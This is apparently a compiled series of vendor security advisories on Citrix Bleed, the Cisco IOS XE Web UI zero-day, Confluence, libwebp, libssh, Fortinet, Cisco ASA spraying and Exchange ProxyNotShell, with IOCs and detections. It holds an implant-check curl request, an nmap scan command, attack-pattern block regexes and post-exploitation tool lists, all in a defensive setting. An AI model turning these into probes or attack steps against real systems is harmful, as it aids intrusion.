- As always I’m a huge proponent of testing your SIEM and endpoint detections whenever possible. You can perform a large amount of non-invasive tests. We’re constantly testing these detections in our labs as we create them and over time, however it’s important to ensure everything is working properly by doing testing of your own when possible. There are great tools that are freely available that assist in this testing such as Atomic Red Team, as well as some short tests you can run listed here
- Do you know what powershell, WMI, batch files, and the like are being executed in your environment? Controlling the directories they run from, and accounts that execute them can be very beneficial in determining anomalies.
How Blumira is Doing Better
There is no unhackable company, software, hardware, or person. I recently had a discussion the other day on the 7-min security podcast about the expectation to be bulletproof, and how that is damaging everyone on both sides of business. You as a person reading this should not expect yourself to know everything and catch everything, it’s just not possible.What is possible, is the ability for us to grow and learn over time and accept that is something that we should constantly be doing. So what could we have done better in this situation?
- We were in the process of creating a detection based on the LOLBAS seen at 19:06 with cvtres.exe. We fast track detections like this when seen in an incident, but we should definitely already be detecting them.
- Using xcopy in this manner was already on our radar, but we hadn’t prioritized it as a detection. Now that we have seen it in a confirmed attack, we have prioritized it for testing in our lab, against previous customer data to determine if we’ve had misses before, and hopefully will release it to production soon along with the detection mentioned above.
Summary
These detections were possible with the installation of either our Blumira Agent or sysmon, however the admin was able to quickly identify and quarantine these hosts with the Blumira Agent. Thanks to the quick actions from both teams, there was no downtime or further remediation needed.
As this incident demonstrates, early detection and proactive security measures are crucial in preventing threat actors from establishing footholds in your environment. If you're looking for others way to improve your security posture, consider the free Blumira Domain Security Assessment. This new tool provides a comprehensive view of your publicly accessible assets and potential security gaps in minutes - no strings attached. Request your free assessment here.
Critical
What Happened?
Security researchers at AssetNote uncovered an easily exploitable authentication bypass vulnerability when investigating Citrix patch updates related to “unauthenticated buffer-related vulnerabilities” previously reported in a Citrix security bulletin. Through a process called “patch diffing”, AssetNote was able to create a proof of concept exploit that bypassed authentication, including MFA, on unpatched systems.
As noted by Citrix in their official security bulletin:
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities:
- NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
- NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
- NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
- NetScaler ADC 13.1-FIPS before 13.1-37.164
- NetScaler ADC 12.1-FIPS before 12.1-55.300
- NetScaler ADC 12.1-NDcPP before 12.1-55.300
Note: NetScaler ADC and NetScaler Gateway version 12.1 have reached end-of-life and are vulnerable.
This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action. NetScaler ADC and NetScaler Gateway appliances that are not configured as a gateway (VPN virtual server, ICA proxy, CVPN, or RDP proxy) or as an AAA virtual server (traditional load balancing configurations, for example) and related products such as NetScaler Application Delivery Management (ADM) and Citrix SD-WAN are not affected.
How Bad is This?
If exploited, this vulnerability leaks the content of system memory to the attacker. Memory leaked in this way may contain a valid Netscaler AAA session cookie belonging to a valid, authenticated user. Using this stolen session cookie, an attacker could impersonate a user and establish a fully authenticated session with the appliance without providing a username or password. It’s important to note that this session cookie is issued post-authentication which means that MFA checks are satisfied and will not prevent an attacker from gaining access.
Confirmed malicious activity following successful exploitation and authentication include typical post-exploitation tactics, techniques, and procedures (TTPs) such as the following:
- Host and network reconnaissance
- Net.exe
- Systeminfo
- whoami
- Credential harvesting
- LSASS dumps
- Mimikatz
- Lateral movement via RDP
- Usage of specific tools and Windows utilities
- 7zip
- Certutil
- SoftPerfect network scanner (netscan.exe)
- csvde.exe
- local.exe
- nbtscan.exe
- Deployment of RMM tools for persistence
- Atera
- AnyDesk
- SplashTop
What Should I Do?
Remediation
If you are running an affected version, Citrix urges administrators to apply updates immediately. Following successful patching, Citrix has also recommended ending all active and persistent sessions. This can be accomplished using the following commands:
- kill icaconnection -all
- kill rdp connection -all
- kill pcoipConnection -all
- kill aaa session -all
- clear lb persistentSessions
Investigation
Tracking and identifying evidence of exploitation is difficult as Citrix appliance logs don’t appear to provide any hints or artifacts of successful exploitation. Mandiant has provided a solid list to help scope your investigation:
- Reviewing NetScaler appliances for evidence of backdoors or web shells.
- Mandiant has provided a tool to help identify such evidence.
- Identifying suspicious logins / lateral movement originating from published systems or resources accessible through the NetScaler appliances.
- Correlating authentication and login events (e.g., VDI systems published through NetScaler appliances) sourced from geographic locations that are not part of an established baseline.
- Correlating authentication and login events where a successful MFA challenge/response was not logged.
Detection
Considering the lack of logging artifacts of exploitation on the Citrix Appliances themselves, it may be helpful to review the logs from network firewalls or web application firewalls that are deployed in front of the NetScaler appliance. Most notably, monitoring traffic to these appliances from suspicious or unusual IP addresses and abnormal requests to the Citrix Appliance URL oauth/idp/.well-known/openid-configuration.
GreyNoise is tracking suspicious IPs under the tag “Citrix ADC Netscaler CVE-2023-4966 Information Disclosure Attempt”. It should be noted that these are just IP addresses caught scanning for the vulnerability. Seeing these in your logs should not be considered a confirmation of a targeted attack or attempted exploitation.
New Blumira detections specifically created in response to this emerging threat:
| Type | Default Status | Name | Description |
| Detection | Enabled | SoftPerfect Network Scanner | Identifies processes running that are associated with the network scanning tool “Network Scanner” by SoftPerfect. |
| Detection | Disabled | Citrix Netscaler: Multiple SSLVPN Users from Same IP | Identifies when multiple users are using Netscaler SSLVPN from the same IP address as advised by Mandiant. |
| Detection | Disabled | Citrix Netscaler: SSLVPN Mismatched Client IP and Source IP | Identifies when an SSLVPN session has a mismatched client IP and source IP which may indicate session hijacking, as advised by Mandiant. |
| Detection | Disabled | Citrix Netscaler: SSLVPN Authentication Outside of US | Identifies when a user SSLVPN authentication occurs outside of the United States. |
| Report | N/A | Citrix Netscaler: SSLVPN Activity by Country | Presents SSLVPN activity grouped by country. This report should help quickly and easily identify any suspicious or unexpected activity. |
| Report | N/A | Citrix Netscaler: All SSLVPN Logins | Surfaces all logs related to user SSLVPN authentication. |
How Blumira Can Help
Blumira detections specific to this exploit:
- Reconnaissance via Net Commands
- Discovery Commands Issued from Unusual Process
- Windows Firewall: Potential RDP Scanning Activity
- Certutil Download
- Mimikatz Process Creation or Command Run
- Mimikatz File Creation Artifacts
- LSASS read with Pypykatz
- Indicator: Password Dumper Remote Thread in LSASS
- Dump LSASS.exe Memory using ProcDump
- Dump LSASS.exe Memory using comsvcs.dll
- Dump LSASS.exe Memory using Windows Task Manager
- Remote Access Tool: Atera
- Remote Access Tool: Splashtop
- Remote Access Tool: AnyDesk
It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real-time to protect your environment. Blumira is actively working on a detection for QueueJumper for its customers.
Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.
Critical
What Happened?
Cisco has published a security advisory tracking the active exploitation of a new zero-day vulnerability in the Cisco IOS Web UI. This flaw affects all versions of Cisco IOS with the HTTP Server feature enabled. It allows an external, unauthenticated attacker to create a new administrative user account with full administrative privileges (level 15 access). Cisco has reported that they have tracked attacks taking advantage of this vulnerability going back to at least September 18, 2023.
How Bad is This?
The ease of exploitation and scope of this attack have earned this vulnerability a CVSS score of 10, which is the highest severity. Networking devices that are susceptible to this issue include switches, routers, and wireless LAN controllers that utilize Cisco IOS XE and that have the HTTP or HTTPS server enabled and open to the public internet. Once exploited, attackers have full access to the device and can perform any actions a fully-authenticated administrator can. This kind of access has the potential to allow an attacker to perform reconnaissance on network traffic, pivot into internal networks, and perform man-in-the-middle attacks which may also lead to compromised domain user credentials. The most common follow-on activity observed by Cisco has been the deployment of an implant that allows remote execution of malicious commands at the system or IOS level.
What Should I Do?
Considering the CVSS score of this vulnerability and potential impact it may have on an environment, Cisco urges organizations with Cisco IOS Web UI devices exposed to the internet to immediately implement the guidance outlined in their PSIRT advisory. At this moment, there are no known workarounds nor system updates to apply to patch this vulnerability.
Cisco recommends that you take the following steps:
- Disable the HTTP Server feature on all internet-facing systems. To disable the HTTP Server feature, use the
no ip http serverorno ip http secure-servercommand in global configuration mode. If both the HTTP server and HTTPS server are in use, then you must use both commands to disable the HTTP Server feature. - If HTTP Server features cannot be disabled, Cisco recommends that you apply access lists to the HTTP Server feature to restrict access from untrusted hosts and networks. They have found this to be an effective mitigation strategy.
- If an implant is confirmed to have been installed, you can reboot the affected device to sever that connection; however, if the attacker still has access to their created account, they can always access the device again and re-implement the implant.
How do I determine whether the HTTP Server feature is enabled?
To determine whether the HTTP Server feature is enabled for a device, access the command line interface and run the following command:
show running-config | include ip http server | secure | active
If ip http server or ip http secure-server is returned, then the HTTP Server feature is enabled.
Look for indicators of compromise
If the HTTP Server feature was enabled on one of your devices, look for the following indicators of compromise:
- Any activity from the following IP addresses:
- 5.149.249[.]74
- 154.53.56[.]231
- Any unrecognized or unexplainable new local users created on the affected device.
Note: cisco_tac_admin, cisco_support have been observed in confirmed exploitations. - Any logins or configuration changes made by any unrecognized accounts. You can narrow down your search by reviewing
%SYS-5-CONFIG_Pmessage logs. These will be present for each instance that a user has accessed the web UI. - Check the system logs for the following message where “filename” is an unknown filename that does not correlate with an expected file installation action:
%WEBUI-6-INSTALL_OPERATION_INFO: User:username,vInstall Operation: ADD filename - Check systems for implants using the following commands, where “systemip” is the IP address of the Cisco device to check, including:
- Systems configured to use HTTPS:
curl -k -X POST "https://systemip/webui/logoutconfirm.html?logon_hash=1" - Systems configured to use HTTP:
curl -k -X POST "http://systemip/webui/logoutconfirm.html?logon_hash=1"
How Blumira Can Help
It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira is actively working on a detection for QueueJumper for its customers.Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities. - Systems configured to use HTTPS:
Critical
What Happened?
On October 4th, 2023, Atlassian disclosed a critical severity vulnerability in Confluence Data Center and Server instances, tracked as CVE-2023-22515. The vulnerability, which received a CNA base score of 10.0, could allow remote attackers to create unauthorized administrator accounts and access Confluence instances on vulnerable Confluence servers.
Who Is Impacted?
The following Confluence versions are affected:
- 8.0.0 – 8.0.4
- 8.1.0, 8.1.3, 8.1.4
- 8.2.0 – 8.2.3
- 8.3.0 – 8.3.2
- 8.4.0 – 8.4.2
- 8.5.0 – 8.5.1
Confluence customers using versions prior to 8.0.0 or an Atlassian-hosted Confluence instance (sites with an atlassian.net domain) are not affected by this vulnerability and therefore do not need to take any action.
How Bad is This?
According to Atlassian’s advisory, unauthorized Confluence administrator account creation and Confluence instance access may have already occurred on some customer systems before the CVE was announced. The potential exploitation of this vulnerability prior to its disclosure makes it a zero-day vulnerability.
While details remain limited, an attacker who successfully exploits this vulnerability could create Confluence administrator accounts, and then do the following:
- Access Confluence instances
- Modify or delete Confluence data
- Execute arbitrary code on the server
What Should I Do?
For administrators hosting publicly-accessible Confluence Data Center and Server instances, a critical severity vulnerability poses a severe threat that warrants urgent response. Given this severity, all impacted organizations should immediately upgrade their affected servers to a fixed version. Those who are unable to upgrade should apply the recommended interim mitigations. Affected servers should be audited for signs of compromise.
Update to a fixed version
Impacted customers are advised to upgrade to a fixed version of Confluence as soon as possible. The fixed versions include the following:
- 8.3.3+
- 8.4.3+
- 8.5.2 (or later)
You can download the latest version of Confluence Data Center and Confluence Server from Atlassian here.
Mitigate if you are unable to update
If you are unable to promptly update the server version, you can instead limit external network access to the affected server. Additional mitigations identified by Atlassian include blocking access to /setup/* endpoints on Confluence instances. This mitigation can be applied at the network layer or by modifying the server configuration by doing the following:
1. On each node, modify the file/<confluence-install-dir>/confluence/WEB-INF/web.xml
to add the following block of code. Ensure that this code block is added before the closing </web-app> tag at the end of the file.
<security-constraint> <web-resource-collection> <url-pattern>/setup/*</url-pattern> <http-method-omission>*</http-method-omission> </web-resource-collection> <auth-constraint /> </security-constraint>Audit for signs of compromise
An administrator should thoroughly review affected Confluence servers to identify any signs of compromise. Review the following potential indicators of compromise (IOCs) to determine whether a security incident may have occurred:
- Unauthorized members of the confluence-administrator group
- Unauthorized user accounts
- Requests to
/setup/*.actionin the network access logs located at<install-directory>/logs/conf_access_log<date>.log - An exception message in
atlassian-confluence-security.logwith the string/setup/setupadministrator.action.
A thorough analysis of these IOCs can help confirm whether exploitation took place and determine the scope of the incident. This allows organizations to fully investigate, remediate, and improve defenses.
How Blumira Can Help
It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment. Blumira will continue to monitor this vulnerability for detection and reporting opportunities.
If you’re not already using Blumira, our Free SIEM edition is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Additional Resources
For more information about this vulnerability, see the following resources:
Critical
What Happened?
CVE-2023-5129 is a critical zero-day vulnerability recently disclosed in the libwebp library, which poses significant security risks across numerous software applications and platforms. Initially reported as CVE-2023-4863, the flaw was found in the lossless compression component of the open-source libwebp library, which is responsible for encoding and decoding WebP format images.
Specifically, CVE-2023-5129 is a heap buffer overflow issue within the Huffman coding algorithm used for lossless compression in WebP. This vulnerability allows attackers to craft malicious WebP images, and when victims open these images, the attackers can execute arbitrary code and access sensitive user data.
How Bad is This?
Heap buffer overflow vulnerabilities, such as CVE-2023-5129, are critically severe, providing attackers with the capability to execute malicious code or gain unauthorized access to systems. This not only opens the door for potential system control but also data theft and malware introduction. Google has confirmed the existence of an exploit for CVE-2023-4863 in the wild, heightening the urgency and significance of addressing this security issue promptly.
The libwebp library, which is extensively integrated into various applications and platforms, has widened the exposure and potential impact of CVE-2023-5129 considerably. The vulnerability is not restricted to affecting web browsers solely; it extends its perilous influence to any software reliant on the libwebp library. Consequently, a multitude of applications and systems operating on Linux, Android, Windows, macOS, and other platforms are under imminent threat, which underscores the necessity of immediate and vigilant protective measures.
In short, simply looking at an image can get you hacked.
What Should I Do?
Users and administrators should urgently:
- Update all software that uses the libwebp library to the latest version. This includes browsers like Google Chrome, Mozilla Firefox, Apple Safari, Microsoft Edge, and other applications like 1Password, Signal, and WhatsApp, among many others.
- Developers and organizations that rely on the libwebp library should prioritize updating to the patched versions to protect their users.
- As a user, ensure your system and applications are updated regularly, and always download updates from official sources to avoid falling victim to exploits targeting this vulnerability.
The difference Between CVE-2023-5129 and CVE-2023-4863
The vulnerability was initially reported as CVE-2023-4863 and was inaccurately attributed solely to Google Chrome. Subsequent investigation, however, unveiled that the flaw was not exclusive to Chrome. Instead, it was fundamentally located in the libwebp library, affecting a multitude of applications and platforms beyond the browser.
The vulnerability was later reclassified under CVE-2023-5129, which accurately identified it as a core issue within the libwebp library. This reclassification elucidated that not only Chrome but any software utilizing the libwebp library could potentially be at risk. However, it should be noted that CVE-2023-5129 has since been rejected as a duplicate. This new understanding of the flaw necessitates attention from a broader spectrum of software vendors and developers, urging them to mitigate the vulnerability in their respective products and platforms.
How Blumira Can Help
Identifying exploitation of CVE-2023-5129 can be challenging due to having to closely monitor affected applications for unusual activity. Implementing a proactive security solution like Blumira can simplify this process:
- Monitoring Application Activity – With Blumira, users, and administrators can efficiently track and analyze the behavior of applications that utilize the libwebp library. Blumira’s automated detection capabilities can alert you to unexpected crashes or peculiar behaviors when WebP images are processed, serving as early indicators of potential exploitation attempts.
- Implementing Security Solutions – Blumira offers a robust security platform designed to identify and obstruct exploits targeting known vulnerabilities like CVE-2023-5129. By actively scanning for and blocking malicious activity, Blumira provides an additional layer of defense against attackers seeking to exploit this critical vulnerability.
- Integration with Antivirus and Next-Gen Antivirus Tools – Blumira seamlessly integrates with conventional antivirus and next-generation antivirus (NGAV) tools, which are crucial to providing visibility into issues like CVE-2023-5129. These integrated antivirus solutions are often the first line of defense and are adept at recognizing and mitigating the exploitation of vulnerabilities. With Blumira’s integration, users and administrators can leverage the combined strength of Blumira’s threat detection and response capabilities with the proactive protection offered by antivirus and NGAV tools to secure their digital environments effectively.
Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Sign up for free and connect to your Microsoft 365 environment in minutes to start detecting and mitigating exposure related to Windows vulnerabilities.
Medium
What Happened?
Rapid7 has reported active exploitation of Cisco ASA SSL VPNs. This is not the result of a new CVE or vulnerability, but rather an observable increase in successful password spraying attacks against these services. Cisco has stated in their own blog that they are “aware of reports that Akira ransomware threat actors have been targeting Cisco VPNs that are not configured for multi-factor authentication to infiltrate organizations, and we have observed instances where threat actors appear to be targeting organizations that do not configure multi-factor authentication for their VPN users.”.
How Bad is This?
In most cases, a VPN will give the authenticated user access to an organization’s internal network and infrastructure. This makes this a serious event; especially considering the attack itself is likely automated. It requires low effort by the threat actor with potential for high returns. Successful unauthorized authentication will also provide the threat actor with valid credentials to use once they get connected to the VPN, meaning they could potentially move laterally within the network.
Sample ASA logs containing IP addresses called out by Rapid7. This activity was over a one month period (Aug 1-31).
What Should I Do?
Due to the nature of password spraying and brute forcing, there is no patch to apply. The best thing to do in response is to begin applying secure, best practices:
- Enable MFA for accounts with SSL VPN access.
- Enforce strong password requirements and do not allow the use of default credentials.
- Limit SSL VPN access to a specific group of users.
- Audit existing SSL VPN permissions and remove users and groups without a business need for VPN access.
- Enable logging of VPN events. Specific details can be found in the Cisco blog post.
- Ensure that Logging Filters for Syslog Server are configured to send “Severity: Informational”
- It is also important to disable “Hide username if its validity cannot be determined” on your Cisco ASA device.
- This can be found in the ASDM GUI under Device Management -> Logging -> Syslog Setup: “Hide username if its validity cannot be determined”
- Alternatively, you can use the command: no logging hide username
- Monitor logs as detailed in the section below.
How To Detect
- Monitor VPN logs for high volumes of failed authentications, especially where the username is generic like “admin”, “guest”, “test”, “printer”, etc.
- Rapid7 has documented a number of IP addresses associated with this activity. Blumira is constantly updating our dynamic blocklists with newly identified IP addresses.
- Cisco has documented logcodes to monitor:
- Login attempts with invalid username and password combinations (%ASA-6-113015)
- RAVPN session creation (attempts) for unexpected profiles/TGs (%ASA-4-113019, %ASA-4-722041, %ASA-7-734003)
- Blumira already has a detection in place titled, “ASA WebVPN Anomalous Access Attempts” will detect this activity.
- There are two Blumira Global reports you can use to monitor this as well:
- Cisco ASA: AAA Authentication Failure Events
- Tracks ASA-6-113015 logcode.
- Cisco ASA: RAVPN Session Creation Attempts
- Tracks ASA-4-113019, ASA-4-722041, and ASA-7-734003 logcodes.
- Cisco ASA: AAA Authentication Failure Events
References:
Akira Ransomware Targeting VPNs without Multi-Factor Authentication | CISCO
Under Siege: Rapid7-Observed Exploitation of Cisco ASA SSL VPNs | Rapid7
Critical
What Happened?
A significant vulnerability has been identified in the libssh library, specifically within the pki_verify_data_signature function, which is used to verify connecting clients’ identities. The function could allow unauthorized access under certain conditions, such as limited or insufficient memory. This issue has been identified as CVE-2023-2283. It is important to note that public proof of concept exploits have been made available, increasing the likelihood of potential attacks.
How Bad is This?
The severity of this vulnerability is considered moderate, but the public availability of exploit code significantly increases its potential impact. LibSSH is utilized by most Linux-based ssh server software, and so this impacts most major Linux distributions and likely many IoT devices as well.
An SSH vulnerability is particularly risky because an authentication bypass lets an attacker right in through the front door. They don’t need to know a password to access the system and would typically have administrator-level access. A successful exploit could lead to unauthorized access and potential misuse of sensitive data or systems.
Libssh vs OpenSSH
One important note for clarity: libssh is not the same thing as openssh.
OpenSSH is a suite of secure networking utilities based on the Secure Shell (SSH) protocol, which provides secure remote login capabilities and other secure network services over an insecure network. OpenSSH is developed as part of the OpenBSD project and is included in many Unix-like operating systems. OpenSSH is widely used.
On the other hand, libssh is a multiplatform C library that implements the SSHv2 and SSHv1 protocol on client and server side. It’s designed to be easy to use for developers and allows applications to provide all sorts of SSH-based functionality. libssh is not related to OpenSSH, and any vulnerabilities found in one do not necessarily apply to the other. LibSSH is less widely used.
Per the security search engine Shodan, there are 803 exposed libssh hosts at the time of this writing; however, this number is likely much higher internally within large enterprise networks.
What Should I Do?
Immediate action is recommended to mitigate this vulnerability. The libssh team has already issued patches for this vulnerability, and it is advised that you update your libssh software to the latest version.
For Ubuntu systems, the following specific updates are available:
- Ubuntu 23.04: libssh-4 – 0.10.4-2ubuntu0.1
- Ubuntu 22.10: libssh-4 – 0.9.6-2ubuntu0.22.10.1
- Ubuntu 22.04: libssh-4 – 0.9.6-2ubuntu0.22.04.1
- Ubuntu 20.04: libssh-4 – 0.9.3-2ubuntu2.3
For other Linux distributions, please check your provider’s latest security bulletins for patch availability.
How To Detect
To detect potential exploitation of this vulnerability, you may be able to monitor your system for unexpected access events, particularly any that could be related to the pki_verify_data_signature function. Further details on detection techniques and strategies may be found in the referenced articles or through your security monitoring solution’s documentation.
To identify potential hosts running libssh in your network, you can use a network scanning tool like Nmap or our Free Domain Assessment. The following command conducts a version detection scan for SSH on all hosts within the subnet 192.168.1.0/24, and then singles out lines specifying “libssh”:
nmap -sV -p 22 192.168.1.0/24 | grep "libssh"
This approach has limitations, though. It’s predicated on the servers sharing a banner that explicitly names libssh. Not all servers provide such specific banners, and sometimes these banners can be misleading or incorrect. This means that despite using this command, further investigation or a manual review might still be necessary for some hosts. In case of any uncertainties, it’s recommended to verify the version of libssh installed on the system.
However, our recommendation is to prioritize patching what you know you have first, then scan for anything you may not already know of.
Additional References:
- https://www.libssh.org/security/advisories/CVE-2023-2283.txt
- https://ubuntu.com/security/notices/USN-6138-1
- https://security-tracker.debian.org/tracker/CVE-2023-2283
- https://www.suse.com/security/cve/CVE-2023-2283.html
How Does Blumira Protect Against This?
Blumira’s security platform includes a specific detection for SSH Connections from Public IP addresses. This detection capability is designed to identify potential scanning and attempted exploitation activities related to this vulnerability.
By continuously monitoring your network traffic, Blumira can alert your IT team to suspicious SSH connections, offering an extra layer of protection against this specific libssh vulnerability. It’s another proactive measure to ensure your systems remain secure.
How Blumira Can Help
It’s nearly impossible for admins to track every vulnerability, but Blumira’s security experts perform threat hunting on your behalf and develop detections in real time to protect your environment.
Blumira’s Free SIEM is easy to deploy; IT and security teams can start seeing immediate security value for their organizations.
Critical
What Happened
French cybersecurity firm Olympe Cyberdefense discovered and disclosed a zero-day vulnerability in Fortinet (CVE-2022-40684) that enables unauthenticated remote code execution (RCE) on devices.
This security flaw affects devices running FortiOS SSL-VPN, according to Fortinet:
- FortiOS version 7.2.0 through 7.2.1
- FortiOS version 7.0.0 through 7.0.6
- FortiProxy version 7.2.0
- FortiProxy version 7.0.0 through 7.0.6
- FortiSwitchManager version 7.2.0
- FortiSwitchManager version 7.0.0
The bug is an authentication bypass vulnerability, which means that unauthenticated attackers are allowed to perform certain administrative tasks by means of specially-crafted HTTP or HTTPS requests. The most common administrative tasks performed by attackers are exfiltrating Fortinet device configurations and creating super admin accounts on the compromised device.
Fortinet quietly fixed the bug on November 28 with the release of FortiOS 7.2.3. On December 12, Fortinet released a security advisory FG-IR-22-398, warning that the vulnerability has been actively exploited in attacks. The advisory recommended customers to immediately validate their systems against indicators of compromise.
How Bad is This?
The vulnerability has a 9.8 score from National Vulnerability Database (NVD) and the CVE Numbering Authority (CNA), making it critical — the highest severity a vulnerability can receive.
An RCE is one of the most dangerous types of flaws because it allows an adversary to execute malicious code on vulnerable servers.
What Should I Do?
First, understand the scope and attack surface of your devices. Identify devices that are not updated to the fixed system versions.
Any device that was running a vulnerable version, and exposed to the Internet should be examined for signs of compromise. If an attacker leveraged this vulnerability to compromise your firewall, applying the patch is unlikely to remove the attacker’s ongoing access.
The best, and possibly only, way to detect if the firewall has been compromised is with the below indicators of compromise. If you are unsure if your firewall has been compromised, or if you have identified signs of compromise, engage with an incident response professional to determine next steps.
You’ll likely need to take the suspect firewall offline for the investigation process to happen. This will cause a service outage, but this step ensures that security is restored to your network.
If you carry cyber liability or similar types of insurance, you should immediately reach out to your insurer, as they may have resources to provide in the event of a suspected incident.
How To Detect
Once all affected devices have been identified, review their logs for indicators of compromise. If your logs are being stored in a SIEM or other separate log analysis system, you should be able to examine the logs in that way. Fortinet has shared the following indicators of compromise:
- Any log entry associated with the user “Local_Process_Access”
- Log entries with the message “System config file has been downloaded by user Local_Process_Access via {source}”
- Source has been seen as “Report Runner” or “Node.js”
- Logs showing IOC will be located under the “System Events” subtype
How Blumira Can Help
Blumira’s incident detection engineering (IDE) team has created a detection in response to this vulnerability, called “Fortigate: Authentication Bypass CVE-2022-40684.” This enables customers to detect instances of CVE-2022-40684 being exploited in their environment.
Blumira’s cloud SIEM detects and alerts you about suspicious behavior in your environment so that you can stop an incident early enough to prevent damage. Each finding we send is accompanied with a security playbook, giving you clear recommendations on how to remediate an attack. Our support team of security analysts is always available to answer questions on how to interpret a finding, or for other security help.
For further technical details, see:
- https://www.truesec.com/hub/blog/fortinet-cve-2022-40684-vulnerability-from-an-incident-response-perspective
- https://www.fortiguard.com/psirt/FG-IR-22-377
- https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2022-40684
- https://nvd.nist.gov/vuln/detail/CVE-2022-40684
Chris Furner, Senior Sales Engineer, contributed to this report.
Critical
What Happened?
Two zero-day vulnerabilities were discovered in Microsoft Exchange Server 2013, 2016, and 2019. One vulnerability, CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability; the other, CVE-2022-41082, is a remote-code execution (RCE) vulnerability when the attacker can access PowerShell.
🚨 There’s reports emerging that a new zero day exists in Microsoft Exchange, and is being actively exploited in the wild 🚨
I can confirm significant numbers of Exchange servers have been backdoored – including a honeypot.
Thread to track issue follows:
— Kevin Beaumont (@GossiTheDog) September 29, 2022
These vulnerabilities are nearly indistinguishable to many ProxyShell attacks in their log and behavior pattern once Exchange is exploited.
ProxyShell is a series of critical vulnerabilities discovered in 2021 that affect on-premises Microsoft Exchange servers. ProxyShell vulnerabilities are especially critical not only because they allow RCE, but because they are relatively easy to execute. The report of an RCE vulnerability within PowerShell Remote is additionally concerning; however, exposure should be limited to internal authenticated users as long as there are no exposed 5985 or 5986 ports to the internet.
It appears these new Exchange vulnerabilities were created by a specific new group that built new attack methods. However, the attack is no different from ProxyShell in the end as we’ve seen: a threat actor spawns cmd via ProxyShell (e.g., spawned via w3wp.exe) and then uses an environment’s living off the land binaries to execute the attack.
How Bad is This?
At the time of this writing, neither CVE rating can be found in NIST’s National Vulnerability Database or MITRE.
However, an RCE is one of the most dangerous types of flaws because it allows an adversary to execute malicious code on vulnerable servers. While Microsoft has confirmed that these are two new RCE vulnerabilities, they have further clarified that authenticated access to the vulnerable Exchange server is required to exploit either of them.
What Should I Do?
According to Microsoft, Exchange Online customers do not need to take any action. However, customers running Microsoft Exchange on-premises should apply Microsoft’s URL Rewrite Instructions and block any exposed Remote PowerShell ports.
The following mitigation details were provided by Microsoft and derived with support by the original reporter of this vulnerability.
The current mitigation is to add a blocking rule in “IIS Manager > Default Web Site > Autodiscover > URL Rewrite > Actions” to block the known attack patterns.
Microsoft has confirmed that the following URL Rewrite Instructions, which are currently being discussed publicly, are successful in breaking current attack chains.
- Open the IIS Manager.
- Expand the Default Web Site.
- Select Autodiscover.
- In the Feature View, click URL Rewrite.
- In the Actions pane on the right-hand side, click Add Rules.
- Select Request Blocking and click OK.
- Add String “
.*autodiscover\.json.*\@.*Powershell.*” (excluding quotes) and click OK.
- Expand the rule and select the rule with the Pattern “
.*autodiscover\.json.*\@.*Powershell.*” and click Edit under Conditions.
- Change the condition input from {URL} to {REQUEST_URI}
Impact: There is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.
Authenticated attackers who can access PowerShell Remoting on vulnerable Exchange systems will be able to trigger RCE using CVE-2022-41082. Blocking the ports used for Remote PowerShell can limit these attacks.
HTTP: 5985HTTPS: 5986
Microsoft has prioritized getting a fix released for these vulnerabilities, so be prepared to start patching once that becomes available.
Update: 10/3/2022 @ 1:30 PM ET
- Microsoft has removed the recommendation to block PowerShell remoting ports (HTTP 5985 and HTTPS 5986). Do not consider this a mitigation for CVE-2022-41082.
- If your Exchange server is eligible and equipped with the Exchange Emergency Mitigation Service (EEMS), Microsoft has pushed an automatic update to block the attack. You can confirm whether or not this has been applied by checking the URL rewrite rules on your Exchange server.
- Open Administrative Tools and browse to IIS Manager > Sites > Default Website > URL Rewrite. It can be identified by the EEMS label included in the name of the rule.
- If you don’t see URL Rewrite in this panel, you will need to install it manually. It is available for Exchange 2013/2016/2019. It is installed by default on Exchange 2016 CU22+ and Exchange 2019 CU11+. Manual download and install can be performed from this page. Be aware that this install does require an IISRESET.
- Microsoft has updated their URL Rewrite instructions to set Action Type to “Abort Request” instead of the original recommendation of “Send an HTTP 403 (Forbidden) Response”
- Microsoft’s original URL Rewrite recommendation for mitigation has been proven to be ineffective. The updated recommendation is to use this string instead:
.*autodiscover\.json.*Powershell.* - It is also recommended to add an additional condition for {HTTP_COOKIE} input with the pattern
Email=autodiscover
- Microsoft has released an updated script to automate the URL Rewrite mitigation. At the moment, this script applies Microsoft’s original (ineffective) URL Rewrite rules. If you want to apply the effective, updated strings, you must do so manually. Microsoft’s automation script can be found here.
How To Detect
Organizations should collect logs with Sysmon on Exchange hosts to identify any malicious activity.
Blumira customers can detect this attack at a number of positions within the kill-chain, keeping in mind that Exchange runs on top of the IIS process itself.
- Potential Exchange ProxyLogon IIS Webshell Activity (Windows – Sysmon)
- IIS process (w3wp.exe) spawns cmd or powershell processes
- Malicious Webshell Connection to External IP (NGFW – IPS)
- A webshell is identified connected outbound
- Webshells by File Write (Windows – Sysmon)
- IIS process (w3wp.exe) drops an asp, aspx, jsp, or php file.
- Potential IIS Webshell Activity (Windows – Sysmon)
- IIS Process (w3wp.exe) as %DefaultAppPool% spawns cmd.exe.
- PowerShell Malicious Execution Detection: Posh C2, PowerShell Malicious Execution Detection: Cobalt Strike, PowerShell Malicious Execution Detection: PowerShell Empire, and PowerShell Empire Module (Windows)
- Looking for patterns of known droppers via PowerShell exploitation
- T1059.001 – PowerShell Fileless Script Execution
- In memory execution of PowerShell scripts, e.g., IEX
